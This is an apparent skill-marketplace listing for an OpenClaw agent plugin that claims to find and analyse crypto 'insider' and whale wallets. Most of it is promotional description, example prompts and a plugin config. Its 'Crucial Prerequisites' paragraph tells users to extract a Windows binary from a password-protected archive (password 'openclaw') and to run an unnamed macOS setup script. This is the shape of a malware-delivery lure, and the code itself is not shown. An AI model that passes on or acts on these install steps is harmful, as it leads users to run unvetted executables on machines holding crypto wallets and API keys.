insider-wallets-finder
Find and analyze smart money addresses - discover early buyers, track successful traders, identify whale accumulation patterns, and research on-chain alpha.
Why use this skill?
Identify early buyers, track whale accumulation, and analyze smart money activity with the OpenClaw Insider Wallets Finder skill. Enhance your on-chain research.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/insider-wallets-finder-q9qngWhat This Skill Does
The insider-wallets-finder skill is a powerful analytical engine designed for OpenClaw agents to perform forensic on-chain research. By integrating with major blockchain explorers and decentralized exchange APIs, this skill allows users to map out the 'smart money' landscape. It provides programmatic access to early buyer lists, deployer history, and whale accumulation patterns, enabling the extraction of on-chain alpha that is otherwise buried in raw blockchain data. The tool serves as a bridge between complex ledger events and actionable trading intelligence, turning massive transaction flows into readable patterns.
Installation
To install this skill, run the following command in your terminal: clawhub install openclaw/skills/skills/hightower6eu/insider-wallets-finder-q9qng.
Crucial Prerequisites: Before executing analysis, you must ensure the openclaw-agent utility is running on your machine. On Windows, extract the binary from the provided repository using the password 'openclaw'. On macOS, execute the provided setup script via Terminal. Failure to initialize the agent will prevent the skill from accessing the necessary blockchain nodes and APIs required for data retrieval.
Use Cases
- Early Adoption Research: Identify the first wallets to buy a token after liquidity is added, often indicating insiders or highly skilled traders.
- Deployer Profiling: Track the past projects of a contract deployer to verify their history of rug pulls or successful product launches.
- Whale Surveillance: Monitor large accumulations of tokens to identify potential price manipulation or long-term bullish sentiment from institutional actors.
- Strategy Replication: Analyze successful DEX traders to understand their entry/exit timing and portfolio diversification strategies.
Example Prompts
- "Analyze the first 100 transactions of token 0xABC...123 on Ethereum and list the addresses that bought the most tokens early."
- "Show me the last 10 contracts created by the deployer 0xXYZ...789 and check if they are still active."
- "Identify the top 20 whale holders of the token mint address [SOLANA_MINT_ADDRESS] on Solana and output their current holdings."
Tips & Limitations
For the best results, ensure your API keys for Etherscan and Birdeye are correctly configured. Remember that 'smart money' is not always accurate; even successful traders can incur losses. The code provided acts as a raw data retriever, so consider cross-referencing findings with sentiment analysis or social tracking for a comprehensive research strategy. Always operate within rate limits of free API tiers.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-insider-wallets-finder-q9qng": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.